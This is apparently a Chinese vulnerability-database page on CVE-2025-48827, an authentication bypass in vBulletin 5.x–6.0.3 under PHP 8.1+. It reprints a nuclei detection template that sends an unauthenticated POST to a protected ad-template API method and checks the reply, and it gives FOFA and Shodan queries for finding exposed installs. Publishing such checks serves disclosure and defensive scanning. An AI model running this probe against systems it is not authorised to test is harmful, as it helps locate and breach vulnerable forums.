CVE-2025-48827: vBulletin 5.0.0-6.0.3 - Authentication Bypass

日期: 2025-08-01 | 影响软件: vBulletin | POC: 已公开

漏洞描述

vBulletin 5.0.0 through 5.7.5 and 6.0.0 through 6.0.3 contain an authentication bypass caused by unauthenticated access to protected API controllers on PHP 8.1 or later, letting unauthenticated attackers invoke protected methods remotely.Starting from PHP 8.1, due to an internal adjustment to handling of ReflectionMethod::invoke() and similar methods, it now allows — by default — invocation of protected / private methods when using PHP's Reflection API.

PoC代码[已公开]

id: CVE-2025-48827

info:
  name: vBulletin 5.0.0-6.0.3 - Authentication Bypass
  author: pszyszkowski
  severity: critical
  description: |
    vBulletin 5.0.0 through 5.7.5 and 6.0.0 through 6.0.3 contain an authentication bypass caused by unauthenticated access to protected API controllers on PHP 8.1 or later, letting unauthenticated attackers invoke protected methods remotely.Starting from PHP 8.1, due to an internal adjustment to handling of ReflectionMethod::invoke() and similar methods, it now allows — by default — invocation of protected / private methods when using PHP's Reflection API.
  impact: |
    Successful exploitation allows unauthenticated remote attackers to execute arbitrary system commands as the web server user, resulting in full system compromise.
  remediation: |
    Upgrade to vBulletin 6.0.4+ before upgrading to PHP 8.1.
  reference:
    - https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
    - https://nvd.nist.gov/vuln/detail/CVE-2025-48827
  classification:
    epss-score: 0.74032
    epss-percentile: 0.98789
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-48827
    cwe-id: CWE-424
    cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: vbulletin
    product: vbulletin
    fofa-query: app="vBulletin"
    shodan-query: http.component:"vBulletin"
  tags: cve,cve2025,rce,vbulletin,intrusive,vkev

variables:
  rand_string: "{{to_lower(rand_base(5))}}"
  rand_value: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /ajax/api/ad/wrapAdTemplate HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        template={{rand_string}}&id_name={{rand_value}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, 'application/json')
          - contains_all(body,'<div class=','ad_{{rand_value}}_inner','{{rand_string}}')
        condition: and
# digest: 490a0046304402200468d58a36ec43d5c5c384ae1164c8921791a5d7df787c04ae139718a59afd1d022022a2c5c9784083dd07d74e8739fe22f1c036bd659d5a7af2c105b44acab1a51e:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-48827.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2016-6195: vBulletin <= 4.2.3 - SQL Injection POC

CVE-2018-6200: vBulletin - Open Redirect POC

CVE-2019-16759: vBulletin 5.0.0-5.5.4 - Remote Command Execution POC

Wordpress Plugin Depicter /wp-admin/admin-ajax.php depicter-lead-list SQL 注入漏洞（CVE-2025-2011） 无POC

Wordpress Plugin Eventin /wp-admin/admin-ajax.php proxy_image 文件读取漏洞（CVE-2025-3419） 无POC

Wordpress Plugin Depicter /wp-admin/admin-ajax.php depicter-lead-list SQL 注入漏洞（CVE-2025-2011）无POC

Wordpress Plugin Eventin /wp-admin/admin-ajax.php proxy_image 文件读取漏洞（CVE-2025-3419）无POC